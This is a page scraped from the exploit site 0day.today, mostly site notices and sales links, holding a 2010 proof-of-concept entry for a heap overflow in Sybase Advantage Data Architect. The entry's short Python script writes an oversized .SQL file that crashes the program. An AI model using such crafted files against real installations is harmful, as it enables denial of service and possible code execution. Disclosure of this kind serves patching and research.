0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sybase Advantage Data Architect "*.SQL" Format Heap Oveflow
=========================================================== Sybase Advantage Data Architect "*.SQL" Format Heap Oveflow =========================================================== # Exploit Title: Sybase Advantage Data Architect "*.SQL" Format Heap Oveflow RCE # Date: 2010-10-16 # Author: d0lc3 (@rmallof - http://elotrolad0.blogspot.com/) # Software Link: http://www.sybase.com/products/databasemanagement/advantagedatabaseserver/data-architect-utility # Version: 10.0 # Tested on: Windows XP SP3 32 bits SPA #Summary: """ From Sybase.com: "Advantage Data Architect Utility: A complete data management system for Advantage developers. Advantage Data Architect assists in designing, creating and maintaining the database layer of a developer's applications." Advantage Data Architect is prone to heap overflow when user opens crafted script file (.SQL) with long data inside. This issue causes a function pointer overwrite, allow us executing arbitrary code (UNICODE). More info can be found on : http://elotrolad0.blogspot.com/2010/11/sybase-advantage-data-architect-sql.html """ #!/usr/bin/python sql="select * from clients where " buf="A"*(1024*300) crash=sql+buf+"="+buf f=open("crash.sql",'w') f.write(crash) f.close() # 0day.today [2024-11-16] #